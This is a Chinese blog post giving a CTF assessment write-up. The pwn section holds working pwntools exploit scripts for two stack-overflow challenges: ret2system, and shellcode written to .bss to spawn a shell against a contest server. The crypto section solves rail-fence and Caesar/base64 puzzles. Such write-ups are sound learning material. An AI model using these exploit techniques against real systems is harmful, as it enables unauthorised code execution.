<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"dh15219984801.store","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="​                                                                      一.pwn1.Girl friend题目来源：https:&#x2F;&#x2F;share.weiyun.com&#x2F;6SVOtJBF 本题开启了NX保护 直接运行，qaq网恋有风险 打开IDA，F5查看c伪代码 并没有很好的思路再shift F12，发现本题有&#x2F;bin&#x2F;sh，并">
<meta property="og:type" content="article">
<meta property="og:title" content="考核Writeup">
<meta property="og:url" content="https://dh15219984801.store/2020/11/18/title%20%E8%80%83%E6%A0%B8Writeup/index.html">
<meta property="og:site_name" content="蜗牛的小屋">
<meta property="og:description" content="​                                                                      一.pwn1.Girl friend题目来源：https:&#x2F;&#x2F;share.weiyun.com&#x2F;6SVOtJBF 本题开启了NX保护 直接运行，qaq网恋有风险 打开IDA，F5查看c伪代码 并没有很好的思路再shift F12，发现本题有&#x2F;bin&#x2F;sh，并">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2020/11/19/2Gn4dMSswX6N3Cx.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/FQjfdbUexODatW4.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/To9pqVMRfaNKBQZ.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/CEeHFyfmstDWTS8.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/d5gIlySZABQGmcH.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/9xRLAnGQCpomh7l.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/aPSpCD9Mc7OFsGw.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/lsKC9t1iwypEfzv.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/vf6XpqeZNYgcrbS.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/57HEzGqymgRswMQ.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/RmNyLSkxs2U6teg.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/3CBKpNaLzxqf7gO.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/RPiUeldTyLvsWC2.png">
<meta property="og:image" content="https://i.loli.net/2020/11/19/AzDf5m9FENrbMGt.png">
<meta property="article:published_time" content="2020-11-18T13:35:11.653Z">
<meta property="article:modified_time" content="2020-11-19T05:36:04.237Z">
<meta property="article:author" content="Theothershore">
<meta property="article:tag" content="CTF-pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/11/19/2Gn4dMSswX6N3Cx.png">

<link rel="canonical" href="https://dh15219984801.store/2020/11/18/title%20%E8%80%83%E6%A0%B8Writeup/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>考核Writeup | 蜗牛的小屋</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="蜗牛的小屋" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">蜗牛的小屋</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Hexo</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

      
          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://dh15219984801.store/2020/11/18/title%20%E8%80%83%E6%A0%B8Writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/001.jpg">
      <meta itemprop="name" content="Theothershore">
      <meta itemprop="description" content="Nothing is impossible!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="蜗牛的小屋">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          考核Writeup
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-11-18 21:35:11" itemprop="dateCreated datePublished" datetime="2020-11-18T21:35:11+08:00">2020-11-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-11-19 13:36:04" itemprop="dateModified" datetime="2020-11-19T13:36:04+08:00">2020-11-19</time>
              </span>

          
            <span id="/2020/11/18/title%20%E8%80%83%E6%A0%B8Writeup/" class="post-meta-item leancloud_visitors" data-flag-title="考核Writeup" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>​                                                                     </p>
<h4 id="一-pwn"><a href="#一-pwn" class="headerlink" title="一.pwn"></a>一.pwn</h4><h5 id="1-Girl-friend"><a href="#1-Girl-friend" class="headerlink" title="1.Girl friend"></a>1.Girl friend</h5><p>题目来源：<a target="_blank" rel="noopener" href="https://share.weiyun.com/6SVOtJBF">https://share.weiyun.com/6SVOtJBF</a></p>
<p>本题开启了NX保护<br><img src="https://i.loli.net/2020/11/19/2Gn4dMSswX6N3Cx.png" alt="image.png"></p>
<p>直接运行，qaq网恋有风险<br><img src="https://i.loli.net/2020/11/19/FQjfdbUexODatW4.png" alt="image.png"></p>
<p>打开IDA，F5查看c伪代码<br><img src="https://i.loli.net/2020/11/19/To9pqVMRfaNKBQZ.png" alt="image.png"></p>
<p>并没有很好的思路<br>再shift F12，发现本题有/bin/sh，并且plt表中也有system的地址</p>
<p><img src="https://i.loli.net/2020/11/19/CEeHFyfmstDWTS8.png" alt="image.png">于是尝试能不能用system（/bin/sh）绕过</p>
<p><strong>脚本</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context(os&#x3D;&#39;linux&#39;,arch&#x3D;&#39;i386&#39;,log_level&#x3D;&#39;debug&#39;)</span><br><span class="line"></span><br><span class="line">pwn &#x3D; process(&#39;.&#x2F;hhhm_want_girl_friend&#39;)</span><br><span class="line"></span><br><span class="line">pwn &#x3D; remote (&quot;47.98.234.232&quot;,28036)</span><br><span class="line"></span><br><span class="line">pwn.recvuntil(&quot;your answer:\n&quot;)</span><br><span class="line"></span><br><span class="line">payload &#x3D;&#39;a&#39;*（0x70+0x4） +p32(0x080483E0)+ p32(0xdeadbeef)+ p32(0x0804A028)</span><br><span class="line"></span><br><span class="line">#payload &#x3D;&#39;a&#39;*110 + p32(system) + p32(0xdeadbeef) + p32(binsh)</span><br><span class="line">#system的内存地址在IDA的plt表直接可见，不用去后门函数那里找，做题的时候卡在这里很久</span><br><span class="line"></span><br><span class="line">pwn.sendline(payload)</span><br><span class="line"></span><br><span class="line">pwn.interactive()</span><br></pre></td></tr></table></figure>

<p>运气不错成功了</p>
<p><img src="https://i.loli.net/2020/11/19/d5gIlySZABQGmcH.png" alt="image.png"></p>
<p>注：本题解法和stackoverflow3类似</p>
<h5 id="2-signin-stackoverflow"><a href="#2-signin-stackoverflow" class="headerlink" title="2.signin_stackoverflow"></a>2.signin_stackoverflow</h5><p>题目来源：<a target="_blank" rel="noopener" href="https://share.weiyun.com/cmSGxipa">https://share.weiyun.com/cmSGxipa</a></p>
<p>直接运行</p>
<p><img src="https://i.loli.net/2020/11/19/9xRLAnGQCpomh7l.png" alt="image.png"></p>
<p>NX保护都没有开启</p>
<p><img src="https://i.loli.net/2020/11/19/aPSpCD9Mc7OFsGw.png" alt="image.png"></p>
<p>IDA分析，发现vul函数中有两个read，简单的思路就是先把第一个read填充完，再填充第二个从而get flag</p>
<p><img src="https://i.loli.net/2020/11/19/lsKC9t1iwypEfzv.png" alt="image.png"></p>
<p>第一个read只需要填满，但是一开始没看清我加上了偏移量emm</p>
<p>在vul函数中，变量buf距离栈底的距离为0x1C，而第二个read可以从终端输入最多0x100字节写入到buf中，可见存在栈溢出</p>
<p>这里利用栈溢出控制指针，再次调用read函数向某地址写入shellcode之后，然后控制指针运行到shellcode。写入地址选择固定地址<strong>bss段</strong>（地址在IDA ctrl+s 查找）</p>
<p><img src="https://i.loli.net/2020/11/19/vf6XpqeZNYgcrbS.png" alt="image.png"></p>
<p>给溢出后调用的read函数e传参，覆写eip的read函数地址应该是plt表中read地址，而不是read函数地址。即填入IDA中<code>_read</code>地址，而不是<code>read</code>地址</p>
<p><img src="https://i.loli.net/2020/11/19/57HEzGqymgRswMQ.png" alt="image.png"></p>
<p><strong>脚本</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line"></span><br><span class="line">pwn = remote (<span class="string">&quot;47.98.234.232&quot;</span>,<span class="number">28040</span>)</span><br><span class="line"></span><br><span class="line">pwn = process(<span class="string">&#x27;./main&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload =p32(<span class="number">0</span>)+p32(<span class="number">0x0804A080</span>)+p32(len(shellcode))</span><br><span class="line"><span class="comment">#填满第一个read函数，无偏移</span></span><br><span class="line"></span><br><span class="line">pwn.recvuntil(<span class="string">&quot;tell me something:\n&quot;</span>)</span><br><span class="line"></span><br><span class="line">pwn.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">#pwn.sendline(shellcode),出错点</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span> +p32(<span class="number">0x080483A0</span>)+p32(<span class="number">0X0804a040</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0X0804a040</span>)+p32(len(shellcode))</span><br><span class="line"><span class="comment">#覆写eip的read函数地址应该是plt表中read地址，而不是read函数地址。即填入IDA中_read地址，而不是read地址</span></span><br><span class="line">pwn.sendline(payload)</span><br><span class="line"></span><br><span class="line">pwn.sendline(shellcode)</span><br><span class="line"></span><br><span class="line">pwn.interactive()</span><br></pre></td></tr></table></figure>

<p>但是该脚本只能在本地运行，远程执行不了，终端显示出错原因应该是远程端口没法打开，不知道怎么解决。</p>
<p>后续补上</p>
<h4 id="二-密码学（Crypto）"><a href="#二-密码学（Crypto）" class="headerlink" title="二 密码学（Crypto）"></a>二 密码学（Crypto）</h4><h5 id="小明家的小菜园"><a href="#小明家的小菜园" class="headerlink" title="小明家的小菜园"></a>小明家的小菜园</h5><p><img src="https://i.loli.net/2020/11/19/RmNyLSkxs2U6teg.png" alt="image.png"></p>
<p><strong>栅栏密码</strong>是一种简单的移动字符位置的加密方法，规则简单，容易破解。栅栏密码的加密方式：把文本按照一定的字数分成多个组，取每组第一个字连起来得到密文1，再取每组第二个字连起来得到密文2……最后把密文1、密文2……连成整段密文。例如：</p>
<p>明文：栅栏密码加密规则示例<br>每组字数：5</p>
<p>按照字数先把明文分成：<br>栅栏密码加<br>密规则示例</p>
<p>先取每组第一个字：栅密<br>再取每组第二个字：栏规<br>……</p>
<p>最后得到“栅密栏规密则码示加例”。</p>
<p>解密则反推：<br>密文被分成2个字一组：<br>栅密<br>栏规<br>密则<br>码示<br>加例</p>
<p>先取每组第一个字：栅栏密码加<br>再取每组第二个字：密规则示例</p>
<p>最后得到“栅栏密码加密规则示例”。</p>
<p>提示：当前的栅栏密码程序不删除空格和换行符。</p>
<ul>
<li>明文或密文中如果出现连续空格将原样保留，复制到其它地方时连续空格可能会变成一个空格，注意保持原样。</li>
<li>在进行多行文本（段落）加密时，每行独立进行加密。</li>
</ul>
<p><img src="https://i.loli.net/2020/11/19/3CBKpNaLzxqf7gO.png" alt="image.png"></p>
<h5 id="恺撒将军"><a href="#恺撒将军" class="headerlink" title="恺撒将军"></a>恺撒将军</h5><p><strong>凯撒密码</strong>参考文献：<a target="_blank" rel="noopener" href="https://wenku.baidu.com/view/d61f164a02d8ce2f0066f5335a8102d276a2618f">https://wenku.baidu.com/view/d61f164a02d8ce2f0066f5335a8102d276a2618f</a></p>
<p><strong>特殊情况</strong>：存在@、<code>]</code>、<code>&lt;</code>等标点字符，一般在线解密会略过，因此用脚本就算出偏移。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">strings = <span class="string">&quot;]p&#123;k]6wmfqozgJ&lt;id[QidKkl[6Qy[5YEf6nziT@@&quot;</span></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> strings:</span><br><span class="line">	flag += chr(ord(i)<span class="number">-3</span>)</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>

<p>解密之后得到的是一个<a target="_blank" rel="noopener" href="https://baike.sogou.com/v53347.htm?fromTitle=base64">base64加密</a>的密文：ZmxhZ3tjcnlwdG9faXNfaHhiX3NvX2VBc3kwfQ==</p>
<p>将得到的base64解码，得到flag</p>
<p><img src="https://i.loli.net/2020/11/19/RPiUeldTyLvsWC2.png" alt="image.png"></p>
<h5 id="战报"><a href="#战报" class="headerlink" title="战报"></a>战报</h5><p>下载txt打开得到它的明文以及暗文，上字词频率统计网站，找到待解密文的字频统计表，最后还原到明文，得到flag{eantosi}</p>
<p>需要注意的是明文的字词频率最大的频次是空格，需要跳过。</p>
<p><img src="https://i.loli.net/2020/11/19/AzDf5m9FENrbMGt.png" alt="image.png"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/11/17/%E6%A0%88%E6%BA%A2%E5%87%BA%20StackOverflow1-5/" rel="prev" title="StackOverflow1-5">
      <i class="fa fa-chevron-left"></i> StackOverflow1-5
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/11/25/%E5%AD%97%E7%AC%A6%E4%B8%B2/" rel="next" title="字符串">
      字符串 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80-pwn"><span class="nav-number">1.</span> <span class="nav-text">一.pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-Girl-friend"><span class="nav-number">1.1.</span> <span class="nav-text">1.Girl friend</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-signin-stackoverflow"><span class="nav-number">1.2.</span> <span class="nav-text">2.signin_stackoverflow</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BA%8C-%E5%AF%86%E7%A0%81%E5%AD%A6%EF%BC%88Crypto%EF%BC%89"><span class="nav-number">2.</span> <span class="nav-text">二 密码学（Crypto）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%B0%8F%E6%98%8E%E5%AE%B6%E7%9A%84%E5%B0%8F%E8%8F%9C%E5%9B%AD"><span class="nav-number">2.1.</span> <span class="nav-text">小明家的小菜园</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%81%BA%E6%92%92%E5%B0%86%E5%86%9B"><span class="nav-number">2.2.</span> <span class="nav-text">恺撒将军</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%88%98%E6%8A%A5"><span class="nav-number">2.3.</span> <span class="nav-text">战报</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Theothershore"
      src="/images/001.jpg">
  <p class="site-author-name" itemprop="name">Theothershore</p>
  <div class="site-description" itemprop="description">Nothing is impossible!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Theothershore" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Theothershore" rel="noopener" target="_blank"><i class="github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://dh15219984801.store/" title="myblog → https:&#x2F;&#x2F;dh15219984801.store&#x2F;"><i class="rss-square fa-fw"></i>myblog</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="university fa-fw"></i>
      pwn
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://dh15219984801.store/2020/10/03/Pwn%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" title="https:&#x2F;&#x2F;dh15219984801.store&#x2F;2020&#x2F;10&#x2F;03&#x2F;Pwn%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA&#x2F;">pwn环境搭建</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Theothershore</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        






<script>
  (function() {
    function leancloudSelector(url) {
      url = encodeURI(url);
      return document.getElementById(url).querySelector('.leancloud-visitors-count');
    }

    function addCount(Counter) {
      var visitors = document.querySelector('.leancloud_visitors');
      var url = decodeURI(visitors.id);
      var title = visitors.dataset.flagTitle;

      Counter('get', '/classes/Counter?where=' + encodeURIComponent(JSON.stringify({ url })))
        .then(response => response.json())
        .then(({ results }) => {
          if (results.length > 0) {
            var counter = results[0];
            leancloudSelector(url).innerText = counter.time + 1;
            Counter('put', '/classes/Counter/' + counter.objectId, { time: { '__op': 'Increment', 'amount': 1 } })
              .catch(error => {
                console.error('Failed to save visitor count', error);
              });
          } else {
              leancloudSelector(url).innerText = 'Counter not initialized! More info at console err msg.';
              console.error('ATTENTION! LeanCloud counter has security bug, see how to solve it here: https://github.com/theme-next/hexo-leancloud-counter-security. \n However, you can still use LeanCloud without security, by setting `security` option to `false`.');
            
          }
        })
        .catch(error => {
          console.error('LeanCloud Counter Error', error);
        });
    }

    function showTime(Counter) {
      var visitors = document.querySelectorAll('.leancloud_visitors');
      var entries = [...visitors].map(element => {
        return decodeURI(element.id);
      });

      Counter('get', '/classes/Counter?where=' + encodeURIComponent(JSON.stringify({ url: { '$in': entries } })))
        .then(response => response.json())
        .then(({ results }) => {
          for (let url of entries) {
            let target = results.find(item => item.url === url);
            leancloudSelector(url).innerText = target ? target.time : 0;
          }
        })
        .catch(error => {
          console.error('LeanCloud Counter Error', error);
        });
    }

    let { app_id, app_key, server_url } = {"enable":true,"app_id":"RKBiRBd7jWQqPC1d8ySAFuvL-gzGzoHsz","app_key":"agSURYNoUmvIR576wrgeIxp2","server_url":null,"security":true};
    function fetchData(api_server) {
      var Counter = (method, url, data) => {
        return fetch(`${api_server}/1.1${url}`, {
          method,
          headers: {
            'X-LC-Id'     : app_id,
            'X-LC-Key'    : app_key,
            'Content-Type': 'application/json',
          },
          body: JSON.stringify(data)
        });
      };
      if (CONFIG.page.isPost) {
        if (CONFIG.hostname !== location.hostname) return;
        addCount(Counter);
      } else if (document.querySelectorAll('.post-title-link').length >= 1) {
        showTime(Counter);
      }
    }

    let api_server = app_id.slice(-9) !== '-MdYXbMMI' ? server_url : `https://${app_id.slice(0, 8).toLowerCase()}.api.lncldglobal.com`;

    if (api_server) {
      fetchData(api_server);
    } else {
      fetch('https://app-router.leancloud.cn/2/route?appId=' + app_id)
        .then(response => response.json())
        .then(({ api_server }) => {
          fetchData('https://' + api_server);
        });
    }
  })();
</script>


      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
